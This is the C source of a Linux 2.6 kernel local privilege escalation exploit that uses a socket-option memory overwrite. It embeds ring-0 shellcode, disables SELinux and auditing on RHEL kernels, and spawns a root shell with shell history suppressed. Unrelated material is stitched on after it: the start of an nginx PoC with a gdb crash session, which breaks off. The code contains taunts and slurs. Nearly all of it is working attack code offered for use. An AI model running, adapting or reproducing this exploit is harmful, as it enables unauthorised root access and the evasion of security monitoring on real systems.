OpenVZ Payload / GRsec bypass removed for kidiots and fame whores. (same thing right ;))
*/
#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <errno.h>
#ifndef __i386__
#error "r34d th3 c0d3 m0r0n!!# () #"
#else
#define _GNU_SOURCE
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy
#define VERT "\033[32m"
#define NORM "\033[0m"
#define BANNER VERT"Ac1dB1tCh3z "NORM"VS Linux kernel 2.6 kernel 0d4y\n"
#define KALLSYMS "/proc/kallsyms"
#define TMAGIC_66TDFDRTS "/proc/timer_list"
#define SELINUX_PATH "/selinux/enforce"
#define RW_FOPS "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD "revert_creds"
#define Y0Y0SMAP 0x100000UL
#define Y0Y0CMAP 0x200000UL
#define Y0Y0STOP (Y0Y0SMAP+0xFFC)
#define J0J0S 0x00200000UL
#define J0J0R00T 0x002000F0UL
#define PAGE_SIZE 0x1000
#define KERN_DHHDYTMLADSFPYT 0x1
#define KERN_DGGDYDTEGGETFDRLAK 0x2
#define KERN_HHSYPPLORQTWGFD 0x4
#define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20
#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40
#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))
#define TRY_REMAP_DEFAULT 1
#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)
static char buffer[1024];
static int s;
static int flags=0;
volatile static socklen_t magiclen=0;
static int useidt=0, usefops=0, uselsm=0;
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};
static __dgdhdytrg55 _m_cpu_off=0;
static char krelease[64];
static char kversion[128];
#define R0C_0FF 14
static char ttrg0ccc[]=
"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"
"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"
"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"
"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"
"\xeb\xcc\x5e\x5b\x5f\x59\xc3";
#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45
char r1ngrrrrrrr[]=
"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"
"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"
"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"
"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"
"\xff\xd3\x5f\x5f\x5a\x5b\xc3";
#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25
static char ttrfd0[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x58\x5f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";
/* implement selinux bypass for IDT ! */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27
static char ruujhdbgatrfe345[]=
"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x0f\x01\xf8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";
#define CJE_4554TFFDTRMAJHD_OFF 10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23
static char dis4blens4sel1nuxhayettgdr64545[]=
"\x41\x52\x50"
"\xb8\x00\x00\x00\x00"
"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x89\x02"
"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
"\x41\x89\x02"
"\x58\x41\x5a";
/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98
struct LSM_rhel
{
__yyrhdgdtfs66ytgetrfd selinux_ops;
__yyrhdgdtfs66ytgetrfd capability_ops;
__yyrhdgdtfs66ytgetrfd dummy_security_ops;
__yyrhdgdtfs66ytgetrfd selinux_enforcing;
__yyrhdgdtfs66ytgetrfd audit_enabled;
const char *krelease;
const char *kversion;
};
struct LSM_rhel known_targets[4]=
{
{
0xffffffff8031e600ULL,
0xffffffff8031fec0ULL,
0xffffffff804acc00ULL,
0xffffffff804af960ULL,
0xffffffff8049b124ULL,
"2.6.18-164.el5",
"#1 SMP Thu Sep 3 03:28:30 EDT 2009" // to manage minor/bug fix changes
},
{
0xffffffff8031f600ULL,
0xffffffff80320ec0ULL,
0xffffffff804afc00ULL,
0xffffffff804b2960ULL,
0xffffffff8049e124ULL,
"2.6.18-164.11.1.el5",
"#1 SMP Wed Jan 6 13:26:04 EST 2010"
},
{
0xffffffff805296a0ULL,
0xffffffff8052af60ULL,
0xffffffff806db1e0ULL,
0xffffffff806ddf40ULL,
0xffffffff806d5324ULL,
"2.6.18-164.11.1.el5xen",
"#1 SMP Wed Jan 20 08:06:04 EST 2010" // default xen
},
{
0xffffffff8031f600ULL,// d selinux_ops
0xffffffff80320ec0ULL,// d capability_ops
0xffffffff804afc00ULL,// B dummy_security_ops
0xffffffff804b2960ULL,// B selinux_enforcing
0xffffffff8049e124ULL,// B audit_enabled
"2.6.18-164.11.1.el5",
"#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
}
};
static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;
struct socketcallAT
{
int s;
int level;
int optname;
void *optval;
volatile socklen_t *optlen;
}__attribute__((packed));
struct idt64from32_s
{
unsigned short limit;
unsigned long base;
}__attribute__((packed));
static __yyrhdgdtfs66ytgetrfd getidt()
{
struct idt64from32_s idt;
memset(&idt, 0x00, sizeof(struct idt64from32_s));
asm volatile("sidt %0" : "=m"(idt));
return idt.base | 0xFFFFFFFF00000000ULL;
}
static int isSelinuxEnabled()
{
FILE *selinux_f;
selinux_f = fopen(SELINUX_PATH, "r");
if(selinux_f == NULL)
{
if(errno == EPERM)
return 1;
else
return 0;
}
fclose(selinux_f);
return 1;
}
static int wtfyourunhere_heee(char *out_release, char* out_version)
{
int ret; const char*ptr;
int count=0;
char r[32], *bptr;
struct utsname buf;
ret = uname(&buf);
if(ret < 0)
return -1;
strcpy(out_release, buf.release);
strcpy(out_version, buf.version);
ptr = buf.release;
bptr = r;
memset(r, 0x00, sizeof(r));
while(*ptr)
{
if(count == 2)
{
if(*ptr >= '0' && *ptr <= '9')
*bptr++ = *ptr;
else
break;
}
if(*ptr == '.')
count++;
ptr++;
}
if(strlen(r) < 1 || !atoi(r))
return -1;
return atoi(r);
}
static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
__dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
__dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
}
static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag)
{
FILE *ka;
char line[512];
char reloc_a[64];
char reloc[64];
if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
return 0;
ka = fopen(filename, "r");
if(!ka)
return 0;
while(fgets(line, 512, ka) != NULL)
{
char *l_p = line;
char *ra_p = reloc_a;
char *r_p = reloc;
memset(reloc, 0x00, sizeof(reloc));
memset(reloc_a, 0x00, sizeof(reloc_a));
while(*l_p != ' ' && (ra_p - reloc_a) < 64)
*ra_p++ = *l_p++;
l_p += 3;
while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64)
*r_p++ = *l_p++;
if(!strcmp(reloc, s))
{
__gggdfstsgdt_dddex("$$$ %s->%s\n", s, reloc_a);
return strtoull(reloc_a, NULL, 16);
}
}
return 0;
}
static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s)
{
return get_sym_ex(s, KALLSYMS, 0);
}
static int parse_cred(const char* val)
{
int i=0;
const char* p = val;
char local[64], *l;
for(i=0; i<3; i++)
{
memset(local, 0x00, sizeof(local));
l = local;
while(*p && *p != ',')
*l++ = *p++;
if(!(*p) && i != 2)
return -1;
_m_cred[i] = strtoull(local, NULL, 16);
p++;
}
return 0;
}
#define SELINUX_OPS "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS "capability_ops"
#define SELINUX_ENFORCING "selinux_enforcing"
#define AUDIT_ENABLED "audit_enabled"
struct LSM_rhel *lsm_rhel_find_target(int check_rhel)
{
int i;
char mapbuf[128];
struct LSM_rhel *lsm = &(known_targets[0]);
if(check_rhel && !isRHHGDPPLADSF(krelease))
{
__pppp_tegddewyfg("!!! N0t a RH3l k3rn3l \n");
return NULL;
}
__pppp_tegddewyfg("$$$ L00k1ng f0r kn0wn t4rg3tz.. \n");
for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++)
{
if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion))
{
__gggdfstsgdt_dddex("$$$ Th1z b1tch 1z t0azt. kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion);
return lsm;
}
}
__pppp_tegddewyfg("$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...\n");
strcpy(mapbuf, "/boot/System.map-");
strcat(mapbuf, krelease);
dyn4nt4n1labeggeyrthryt.selinux_ops = get_sym_ex(SELINUX_OPS, mapbuf, 1);
dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
dyn4nt4n1labeggeyrthryt.capability_ops = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
dyn4nt4n1labeggeyrthryt.selinux_enforcing = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
dyn4nt4n1labeggeyrthryt.audit_enabled = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);
if(!dyn4nt4n1labeggeyrthryt.selinux_ops ||
!dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
!dyn4nt4n1labeggeyrthryt.capability_ops ||
!dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
!dyn4nt4n1labeggeyrthryt.audit_enabled)
return NULL;
return &dyn4nt4n1labeggeyrthryt;
}
static void put_your_hands_up_hooker(int argc, char *argv[])
{
int fd,ver,ret;
char __b[16];
fd = open(KALLSYMS, O_RDONLY);
ret = read(fd, __b, 16); // dummy read
if((fd >= 0 && ret > 0))
{
__pppp_tegddewyfg("$$$ Kallsyms +r\t\n"); // d0nt p4tch m3 br0
flags |= KERN_HHSYPPLORQTWGFD;
}
close(fd);
ver = wtfyourunhere_heee(krelease, kversion);
if(ver < 0)
__yyy_tegdtfsrer("!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!\n");
__gggdfstsgdt_dddex("$$$ K3rn3l r3l3as3: %s\n", krelease);
if(argc != 1)
{
while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0)
{
switch(ret)
{
case 'i':
flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
useidt=1; // u have to use -i to force IDT Vector
break;
case 'f':
flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
break;
case 'l':
flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
break;
case 'c':
if(!optarg || parse_cred(optarg) < 0)
__yyy_tegdtfsrer("!!! Un4bl3 t0 p4s3 cr3d c0d3z\n");
break;
case 'k':
if(optarg)
_m_fops = strtoull(optarg, NULL, 16);
else
__yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0P numb3rs\n");
break;
case 's':
if(!isSelinuxEnabled())
__pppp_tegddewyfg("??? wh4t th3 fuq s3l1nux 1z n0t 3v3n 3n4bl3d!?\n");
else
flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
break;
case 'o':
if(optarg)
_m_cpu_off = strtoull(optarg, NULL, 16);
else
__yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n");
break;
}
}
}
if(ver >= 29) // needs cred structure
{
flags |= KERN_DGGDYDTEGGETFDRLAK;
if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
{
_m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
_m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD);
_m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
}
if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
{
__yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");
}
__pppp_tegddewyfg("$$$ Kernel Credentials detected\n");
*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
}
if(ver >= 30) // needs cpu offset
{
flags |= KERN_DHHDYTMLADSFPYT;
if(!_m_cpu_off)
_m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);
if(!_m_cpu_off)
__yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");
__pppp_tegddewyfg("$$$ K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n");
*((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
*((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
}
}
static void env_prepare(int argc, char* argv[])
{
put_your_hands_up_hooker(argc, argv);
if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS)) // try fops
{
__pppp_tegddewyfg("??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d\n");
if(!_m_fops)
_m_fops = get_sym(RW_FOPS);
/* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
* Thanks to the guy who killed this vector... you know who you are:)
* Lucky for you, there are more:)
*/
if(_m_fops)
{
usefops=1;
__pppp_tegddewyfg("$$$ w34p0n 0f ch01c3: F0PZzZzzz\n");
}
}
if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel)
{
curr_target = lsm_rhel_find_target(1);
if(!curr_target)
{
__pppp_tegddewyfg("!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n");
}
else
uselsm=1;
}
if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
{
// -i flag
curr_target = lsm_rhel_find_target(0);
if(!curr_target)
{
__pppp_tegddewyfg("!!! Un4lb3 t0 f1nd t4rg3t: c0ntinu3 w1th0ut s3linsux d1s4bl3.\n");
/* remove Selinux Flag */
flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
}
}
if(!usefops && !useidt && !uselsm)
__yyy_tegdtfsrer("!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0l\n");
}
static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack)
{
int socklen_l = 8 + stack - addr - 16;
return socklen_l;
}
static struct socketcallAT at;
static __dgdhdytrg55 idtover[4] =
{0x00100000UL,
0x0020ee00UL,
0x00000000UL,
0x00000000UL};
static void fillsocketcallAT()
{
at.s = s;
at.level = SOL_IP;
at.optname = MCAST_MSFILTER;
at.optval = buffer;
at.optlen = &magiclen;
}
static void bitch_call(struct socketcallAT *at, void *stack)
{
asm volatile(
"push %%ebx\t\n"
"push %%esi\t\n"
"push %%ecx\t\n"
"push %%edx\t\n"
"movl $0x66, %%eax\t\n"
"movl $0xf, %%ebx\t\n"
"movl %%esp, %%esi\t\n"
"movl %0, %%ecx\t\n"
"movl %1, %%esp\t\n"
"int $0x80\t\n"
"movl %%esi, %%esp\t\n"
"pop %%edx\t\n"
"pop %%ecx\t\n"
"pop %%esi\t\n"
"pop %%ebx\t\n"
: : "r"(at), "r"(stack) : "memory", "eax", "ecx", "ebx", "esi"
);
}
static void __setmcbuffer(__dgdhdytrg55 value)
{
int i;
__dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;
for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
*(p+i) = value;
}
static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase)
{
int i;
__dgdhdytrg55 curr;
for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++)
{
curr = idtover[i];
__setmcbuffer(curr);
magiclen = get_socklen(idtbase + (i*4), Y0Y0STOP);
bitch_call(&at, (void*)Y0Y0STOP);
}
}
static void y0y0stack()
{
void* map = mmap((void*)Y0Y0SMAP,
PAGE_SIZE,
PROT_READ|PROT_WRITE,
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,
-1,0);
if(MAP_FAILED == map)
__xxxfdgftr_hshsgdt("mmap");
}
static void y0y0code()
{
void* map = mmap((void*)Y0Y0CMAP,
PAGE_SIZE,
#ifdef TRY_REMAP_DEFAULT
PROT_READ|PROT_WRITE,
#else
PROT_READ|PROT_WRITE|PROT_EXEC,
#endif
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,
-1,0);
if(MAP_FAILED == map)
__xxxfdgftr_hshsgdt("mmap");
}
static int rey0y0code(unsigned long old)
{
int fd;
void *map;
volatile char wizard;
char cwd[1024];
getcwd(cwd, sizeof(cwd));
strcat(cwd, "/__tmpfile");
unlink(cwd);
fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
if(fd < 0)
return -1;
write(fd, (const void*)old, PAGE_SIZE);
if(munmap((void*)old, PAGE_SIZE) < 0)
return -1;
map = mmap((void*)old,
PAGE_SIZE,
PROT_READ|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED,
fd,0);
if(map == MAP_FAILED)
return -1;
/* avoid lazy page fault handler
* Triple Fault when using idt vector
* and no pages are already mapped:)
*/
wizard = *((char*)old);
unlink(cwd);
return wizard;
}
int main(int argc, char*argv[])
{
int uid,fd;
__yyrhdgdtfs66ytgetrfd *patch, idtb;
struct pollfd pfd;
printf(BANNER);
uid = getuid();
env_prepare(argc, argv);
y0y0stack();
y0y0code();
if(useidt)
{
idtb = getidt();
__gggdfstsgdt_dddex("$$$ h0m3 b4s3 addr3ss: %llx\n", idtb);
__pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - IDT m3th34d\n");
patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
*patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
__pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n");
if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)
{
__pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n");
p4tch_sel1nux_codztegfaddczda(curr_target);
}
__dhdyetgdfstreg__((void*)J0J0S, ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
}
else if(usefops || uselsm)
{
__pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d\n");
patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
*patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
__setmcbuffer(J0J0S);
__pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n");
if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
{
__pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n");
p4tch_sel1nux_codztegfaddczda(curr_target);
}
__dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));
}
/* set shellcode level 2 */
if(flags & KERN_DGGDYDTEGGETFDRLAK)
{
__pppp_tegddewyfg("$$$ Us1ng cr3d s3ash3llc0d3z\n");
__dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
}
else
{
__pppp_tegddewyfg("$$$ Us1ng st4nd4rd s3ash3llz\n");
__dhdyetgdfstreg__((void*)J0J0R00T, ttrg0ccc, sizeof(ttrg0ccc));
*((unsigned int*)(J0J0R00T + R0C_0FF)) = uid;
}
__pppp_tegddewyfg("$$$ 0p3n1ng th3 m4giq p0rt4l\n");
s = socket(AF_INET, SOCK_DGRAM, 0);
if(s < 0)
__xxxfdgftr_hshsgdt("socket");
fillsocketcallAT();
#ifdef TRY_REMAP_DEFAULT
if(rey0y0code(Y0Y0CMAP) < 0)
__yyy_tegdtfsrer("!!! Un4bl3 t0 r3m4p sh1t\t\n");
#endif
if(useidt)
{
__yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd);
__gggdfstsgdt_dddex("$$$ Us1ng 1dt 3ntry: %d\n", 0xdd);
idt_smash((idtentry));
sleep(1);
asm volatile("int $0xdd\t\n");
}
else if(usefops)
{
magiclen = get_socklen(_m_fops, Y0Y0STOP);
magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd);
__gggdfstsgdt_dddex("$$$ m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen);
__pppp_tegddewyfg("$$$ 0v3r thr0w f0ps g0v3rnm3nt\n");
bitch_call(&at, (void*)Y0Y0STOP);
sleep(1);
fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
if(fd < 0)
__xxxfdgftr_hshsgdt("!!! fuq t1m3r_l1st");
pfd.fd = fd;
pfd.events = POLLIN | POLLOUT;
poll(&pfd, 1, 0);
}
else if(uselsm)
{
int msqid;
__yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF);
__yyrhdgdtfs66ytgetrfd dummy_msg_off = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF);
__yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF);
msqid = msgget(0, IPC_PRIVATE|0600);
if(msqid < 0)
__xxxfdgftr_hshsgdt("!!! fuqqqqqq msgg3t");
magiclen = get_socklen(selinux_msg_off, Y0Y0STOP);
__setmcbuffer(J0J0S);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP);
__setmcbuffer(0);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(dummy_msg_off, Y0Y0STOP);
__setmcbuffer(J0J0S);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(dummy_msg_off+4, Y0Y0STOP);
__setmcbuffer(0);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(capability_msg_off, Y0Y0STOP);
__setmcbuffer(J0J0S);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(capability_msg_off+4, Y0Y0STOP);
__setmcbuffer(0);
bitch_call(&at, (void*)Y0Y0STOP);
msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it
}
munmap((void*)Y0Y0CMAP, PAGE_SIZE);
/* exec */
if(getuid() == 0)
{
pid_t pid;
__pppp_tegddewyfg("$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n");
pid = fork();
if(pid == 0)
{
char *args[] = {"/bin/sh", "-i", NULL};
char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0",
"PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
execve("/bin/sh", args, envp);
}
else
{
int status;
waitpid(pid, &status, 0);
}
}
else
__pppp_tegddewyfg("!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!\n");
close(s);
return 0;
}
#endif // -m32
Zeus Penguin/nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC ( linux)
debian:~# uname -a Linux debian 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC
2009 i686 GNU/Linux
debian:~# cat /etc/issue
Debian GNU/Linux 4.0 \n \l
debian:~# dpkg -l|grep nginx
ii nginx 0.4.13-2+etch2 small, but very powerful and efficient
debian:~# ps xauwww|grep worker|grep -v grep
www-data 3577 0.0 0.9 2688 928 ? S 01:50 0:00 nginx: worker process
debian:~# gdb -p 3577
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
Attaching to process 3577
Reading symbols from /usr/sbin/nginx...(no debugging symbols found)...done.
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Reading symbols from /lib/tls/i686/cmov/libcrypt.so.1...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libcrypt.so.1
Reading symbols from /usr/lib/libpcre.so.3...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libpcre.so.3
Reading symbols from /usr/lib/libz.so.1...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /lib/tls/i686/cmov/libc.so.6...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_compat.so.2...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_compat.so.2
Reading symbols from /lib/tls/i686/cmov/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnsl.so.1
Reading symbols from /lib/tls/i686/cmov/libnss_nis.so.2...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_nis.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_files.so.2...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_files.so.2
Failed to read a valid object file image from memory.
0xb7f06410 in ?? ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x08068f23 in ?? ()
(gdb) bt
#0 0x08068f23 in ?? ()
#1 0x080b0540 in ?? ()
#2 0x080a54e4 in ?? ()
#3 0x00000000 in ?? ()
(gdb) i r
eax 0x6d4 1748
ecx 0xbff21028 -1074655192
edx 0x80b1794 134944660
ebx 0x80b0540 134939968
esp 0xbff21880 0xbff21880
ebp 0xbff218d8 0xbff218d8
esi 0x80b5630 134960688
edi 0x80b0540 134939968
